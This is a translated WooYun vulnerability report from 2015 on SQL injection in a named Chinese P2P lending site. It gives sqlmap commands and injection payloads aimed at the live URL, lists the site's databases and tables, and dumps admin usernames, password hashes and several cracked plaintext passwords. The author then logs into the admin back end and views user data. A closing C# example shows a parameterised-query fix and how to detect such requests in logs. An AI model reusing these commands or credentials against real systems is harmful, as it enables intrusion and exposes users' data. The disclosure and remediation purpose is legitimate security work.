
Vulnerability summary

Defect ID: wooyun-2015-0131431

Title: SQL blind injection on a P2P lending site (back end accessed; information of 2,000+ users leaked)

Affected vendor: 四川华澳融信投资管理有限公司

Author: 帅克笛枫

Submitted: 2015-08-05 16:49

Fixed: 2015-09-21 15:26

Published: 2015-09-21 15:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-05: details sent to the vendor, awaiting vendor handling
2015-08-07: vendor confirmed; details visible only to the vendor
2015-08-17: details disclosed to core white hats and relevant domain experts
2015-08-27: details disclosed to regular white hats
2015-09-06: details disclosed to intern white hats
2015-09-21: details disclosed to the public

Brief description:

~Life has its ups and downs~ you still have to live on strong~ the bond of friendship is higher than the sky and wider than the earth~ we will surely remember those years~ the bond of friendship is the rarest thing we have in this life~

Detailed description:

The site of 四川华澳融信投资管理有限公司, http://www.huaop2p.com/content.aspx?id=533249066410, as shown in the figure:

ha1.png

Feed the link to sqlmap for testing, as shown in the figures:

ha2.png

ha3.png

All databases on the system, as follows:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
available databases [80]:
[*] a0113182216
[*] a0128011355
[*] a0130145917
[*] a0201104743
[*] a0208164407
[*] a0210153415
[*] a0228084431
[*] a0311102642
[*] a0330140301
[*] a0418174447
[*] a0419110926
[*] a0427235123
[*] a0501153320
[*] a0520203405
[*] a0527185201
[*] a0602231518
[*] a0604195047
[*] a0608102832
[*] a0610012306
[*] a0615122150
[*] a0616084743
[*] a0620155344
[*] a06301737001093710
[*] a0701225317
[*] a0702205607
[*] a0703081717
[*] a0707010235
[*] a0710002920
[*] a0714091756
[*] a0722080206
[*] a0728213444
[*] a0730153611
[*] a09031058139
[*] a09031154589
[*] a0903191547
[*] a0906182409
[*] a0916114309
[*] a1013000956
[*] a101510471810052
[*] a1020232323
[*] a1024124641
[*] a1024141701
[*] a1027194218549210
[*] a1027194510767010
[*] a102719491898383
[*] a102720205710379
[*] a102720320621600
[*] a1027203402321037
[*] a10282223425
[*] a1101205421
[*] a1102234009
[*] a111020573387044
[*] a111020581665710
[*] a111110315410716
[*] a1112182355
[*] a1114140610434810
[*] a1121082245
[*] a1124195710
[*] a1206212205
[*] a1209231849
[*] a1210001138
[*] a1212153729
[*] fayapower
[*] fayapxbbs
[*] gxlqjyzx
[*] gzhyseo
[*] huao
[*] jtylqx
[*] lingui88
[*] marutomo
[*] master
[*] model
[*] msdb
[*] nanchunhui01
[*] pxpstcom
[*] sqnbxinyi
[*] tempdb
[*] tiantang9988
[*] zghmj
[*] zouchangfu
[21:20:19] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\output\www.huaop2p.com'


View the current database and user, as follows:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410" --current-user --current-db
[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410" -D huao --tables
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=533249066410' AND 2200=2200 AND 'zgDf'='zgDf
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=533249066410' AND 7847=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(118)
+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (7847=7847) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(58)+CHAR(103)+CHAR(115)+CHAR(112)+CHAR(58))) AND 'Tmkk'='Tmkk
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=533249066410' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(118)+CHAR
(114)+CHAR(58)+CHAR(115)+CHAR(73)+CHAR(108)+CHAR(81)+CHAR(100)+CHAR(87)+CHAR(113
)+CHAR(105)+CHAR(111)+CHAR(106)+CHAR(58)+CHAR(103)+CHAR(115)+CHAR(112)+CHAR(58)-
-
---
[21:21:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[21:21:35] [INFO] fetching current user
current user: 'huao'
[21:21:35] [INFO] fetching current database
current database: 'huao'
[21:21:35] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\output\www.huaop2p.com'
[*] shutting down at 21:21:35

Proof of vulnerability:

Get all tables in the current database, as follows:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410" -D huao --tables
Database: huao
[105 tables]
+---------------------------------------+
| dbo.Web_Info_Data |
| dbo.Web_Info_Type |
| dbo.fs_Attachments |
| dbo.fs_Collect_News |
| dbo.fs_Collect_Rule |
| dbo.fs_Collect_RuleApply |
| dbo.fs_Collect_Site |
| dbo.fs_Collect_SiteFolder |
| dbo.fs_News_URL |
| dbo.fs_User_URL |
| dbo.fs_User_URLClass |
| dbo.fs_ads |
| dbo.fs_ads_class |
| dbo.fs_ads_stat |
| dbo.fs_adstxt |
| dbo.fs_api_commentary |
| dbo.fs_api_faviate |
| dbo.fs_api_navi |
| dbo.fs_classdroptemplet |
| dbo.fs_customform |
| dbo.fs_customform_item |
| dbo.fs_define_class |
| dbo.fs_define_data |
| dbo.fs_define_save |
| dbo.fs_friend_class |
| dbo.fs_friend_link |
| dbo.fs_friend_pram |
| dbo.fs_news |
| dbo.fs_news_Class |
| dbo.fs_news_Gen |
| dbo.fs_news_JS |
| dbo.fs_news_JSFile |
| dbo.fs_news_JST_Class |
| dbo.fs_news_JSTemplet |
| dbo.fs_news_area |
| dbo.fs_news_jobclass |
| dbo.fs_news_page |
| dbo.fs_news_site |
| dbo.fs_news_special |
| dbo.fs_news_sub |
| dbo.fs_news_topline |
| dbo.fs_news_unNews |
| dbo.fs_news_vote |
| dbo.fs_newsdroptemplet |
| dbo.fs_old_news |
| dbo.fs_special_news |
| dbo.fs_specialdroptemplet |
| dbo.fs_stat_Info |
| dbo.fs_stat_class |
| dbo.fs_stat_content |
| dbo.fs_stat_param |
| dbo.fs_sys_City |
| dbo.fs_sys_Help |
| dbo.fs_sys_Label |
| dbo.fs_sys_LabelClass |
| dbo.fs_sys_LabelFree |
| dbo.fs_sys_LabelStyle |
| dbo.fs_sys_PramUser |
| dbo.fs_sys_Pramother |
| dbo.fs_sys_User |
| dbo.fs_sys_UserLevel |
| dbo.fs_sys_admin |
| dbo.fs_sys_admingroup |
| dbo.fs_sys_logs |
| dbo.fs_sys_newsIndex |
| dbo.fs_sys_param |
| dbo.fs_sys_parmConstr |
| dbo.fs_sys_parmPrint |
| dbo.fs_sys_styleclass |
| dbo.fs_sys_userfields |
| dbo.fs_sys_userother |
| dbo.fs_user_Card |
| dbo.fs_user_Constr |
| dbo.fs_user_ConstrClass |
| dbo.fs_user_Discuss |
| dbo.fs_user_DiscussActive |
| dbo.fs_user_DiscussActiveMember |
| dbo.fs_user_DiscussClass |
| dbo.fs_user_DiscussContribute |
| dbo.fs_user_DiscussMember |
| dbo.fs_user_DiscussTopic |
| dbo.fs_user_Friend |
| dbo.fs_user_FriendClass |
| dbo.fs_user_Ghistory |
| dbo.fs_user_Group |
| dbo.fs_user_Guest |
| dbo.fs_user_Guser |
| dbo.fs_user_MessFiles |
| dbo.fs_user_Message |
| dbo.fs_user_Photo |
| dbo.fs_user_Photoalbum |
| dbo.fs_user_PhotoalbumClass |
| dbo.fs_user_Requestinformation |
| dbo.fs_user_constrPay |
| dbo.fs_user_news |
| dbo.fs_user_note |
| dbo.fs_user_userlogs |
| dbo.fs_user_vote |
| dbo.fs_vote_Item |
| dbo.fs_vote_Steps |
| dbo.fs_vote_class |
| dbo.fs_vote_manage |
| dbo.fs_vote_param |
| dbo.fs_vote_title |
| dbo.station_userbaseinfo_province_tab |
+---------------------------------------+


Inspect the current table's data, as follows:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410" -D huao -T dbo.fs_sys_User --columns
Database: huao
Table: dbo.fs_sys_User
[45 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| Addfriend | int |
| Addfriendbs | tinyint |
| aPoint | int |
| BindTF | tinyint |
| birthday | datetime |
| CertNumber | nvarchar |
| CertType | nvarchar |
| cPoint | int |
| EmailATF | tinyint |
| EmailCode | nvarchar |
| ePoint | int |
| FriendClass | nvarchar |
| gPoint | int |
| Id | bigint |
| IDcardFiles | nvarchar |
| iPoint | int |
| isAdmin | tinyint |
| isIDcard | tinyint |
| isLock | tinyint |
| isMobile | tinyint |
| isOpen | tinyint |
| LastIP | nvarchar |
| LastLoginTime | datetime |
| LoginLimtNumber | int |
| LoginNumber | int |
| marriage | tinyint |
| mobile | nvarchar |
| MobileCode | nvarchar |
| NickName | nvarchar |
| OnlineTF | int |
| OnlineTime | int |
| ParmConstrNum | int |
| PassKey | nvarchar |
| PassQuestion | nvarchar |
| RealName | nvarchar |
| RegTime | datetime |
| Sex | tinyint |
| SiteID | nvarchar |
| UserFace | nvarchar |
| userFacesize | nvarchar |
| UserGroupNumber | nvarchar |
| Userinfo | ntext |
| UserName | nvarchar |
| UserNum | nvarchar |
| UserPassword | nvarchar |
+-----------------+----------+
[20:15:51] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\output\www.huaop2p.com'

Get the current admin users with their account names and passwords, as shown:

[root@Hacker~]# Sqlmap -u "http://www.huaop2p.com/content.aspx?id=533249066410" -D huao -T dbo.fs_sys_User -C isAdmin,UserName,Userinfo,UserPassword --dump
Database: huao
Table: dbo.fs_sys_User
[6 entries]
+---------+------------+----------+------------------+
| isAdmin | UserName | Userinfo | UserPassword |
+---------+------------+----------+------------------+
| 1 | admin | <blank> | 91b974bd182997b3 |
| 0 | adminn | <blank> | 16a7c67e2727b471 |
| 1 | chenxinrui | <blank> | f1a0b468d16e3863 |
| 0 | dwqdwqd | <blank> | cbfb3919a2b2e8f8 |
| 1 | user | <blank> | ac59075b964b0715 |
| 1 | zhaopin | <blank> | 0abda1fe89448375 |
+---------+------------+----------+------------------+
f1a0b468d16e3863
Lookup result:
Apr.24
0abda1fe89448375
Lookup result:
huaop2p
cbfb3919a2b2e8f8
Lookup result:
dwqdwqd
[20:29:13] [INFO] table 'huao.dbo.fs_sys_User' dumped to CSV file 'F:\wooyun\sqlmap\Bin\output\www.huaop2p.com\dump\huao\fs_sys_User.csv'
[20:29:13] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\output\www.huaop2p.com'
[*] shutting down at 20:29:13

Thanks to a fellow expert for helping to decrypt them. I originally meant to test for XSS, but found the site runs Foosun (风讯) CMS 2.0, as shown in the figures:

ha7.png

ha8.png

The default back-end admin address is http://www.huaop2p.com/manage/Index.aspx; enter the admin username and password, as shown:

ha4.png

View user information, as shown in the figures:

ha5.png

ha6.png

Fix recommendation:

Filter the input, improve the queries; you are more professional at fixing this than I am.
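The fix advice above targets the pattern behind content.aspx?id=: the id value reaches the SQL text unparsed, which is why sqlmap's boolean-blind, error-based and UNION payloads all worked. The following C# is an added example, not the site's or Foosun CMS's code, contrasting that concatenation with a validated, parameterised query on ASP.NET / SQL Server. The table dbo.fs_news, the database name huao, the parameter name id and the payload string come from the report; the class and method names, the Title and Content columns, and the connection string are assumptions.

```csharp
// Added example, not the site's or Foosun CMS's code. Class/method names, the Title and
// Content columns of dbo.fs_news and the connection string are assumptions; the table
// name, database name and the id parameter come from the report.
using System;
using System.Data;
using System.Data.SqlClient;

public static class ContentRepository
{
    // VULNERABLE: the raw query-string value is spliced into the SQL text. A value such as
    // the boolean-blind payload sqlmap reported (id=533249066410' AND 2200=2200 AND 'zgDf'='zgDf)
    // therefore becomes part of the WHERE clause instead of a comparison operand.
    public static string BuildVulnerableQuery(string rawId)
    {
        return "SELECT Title, Content FROM dbo.fs_news WHERE Id = '" + rawId + "'";
    }

    // FIXED: validate that id is the integer the schema expects, then bind it as a typed
    // parameter. The SQL text is a constant, so no input can alter its structure, and
    // anything that is not a positive integer is rejected before any SQL is built.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string rawId)
    {
        long id;
        if (!long.TryParse(rawId, out id) || id <= 0)
        {
            throw new ArgumentException("id must be a positive integer", "rawId");
        }

        SqlCommand cmd = new SqlCommand(
            "SELECT Title, Content FROM dbo.fs_news WHERE Id = @id", conn);
        cmd.Parameters.Add("@id", SqlDbType.BigInt).Value = id;
        return cmd;
    }

    public static void Main()
    {
        // Constructed inputs: the legitimate id from the report and the boolean-blind payload.
        string legit = "533249066410";
        string payload = "533249066410' AND 2200=2200 AND 'zgDf'='zgDf";

        // The concatenated version carries the attacker's text straight into the query.
        Console.WriteLine("concatenated: " + BuildVulnerableQuery(payload));

        // Placeholder connection string; nothing is executed here, the command is only built.
        using (SqlConnection conn = new SqlConnection(
            "Server=(local);Database=huao;Integrated Security=true"))
        {
            SqlCommand ok = BuildSafeCommand(conn, legit);
            Console.WriteLine("parameterised: " + ok.CommandText
                + "  @id=" + ok.Parameters["@id"].Value);

            try
            {
                BuildSafeCommand(conn, payload);
            }
            catch (ArgumentException e)
            {
                Console.WriteLine("rejected: " + e.Message);
            }
        }
    }
}
```

Validating id as an integer is specific to this page; string parameters (search terms, user names) cannot be "filtered" into safety and need the same parameter binding. As a compensating control while the code is fixed, the error-based and UNION payloads in the sqlmap output above leave distinctive fragments such as CONVERT(INT and UNION ALL SELECT in the IIS query-string log field, which is a simple thing to alert on.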

Copyright notice: when reposting, please credit the source 帅克笛枫@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-07 15:25

Vendor reply:

CNVD has confirmed and reproduced the described situation and has notified the software vendor (or site operator) by email through its public contact channel; they will provide a solution and coordinate the handling with the affected user organisations.

Latest status:

None yet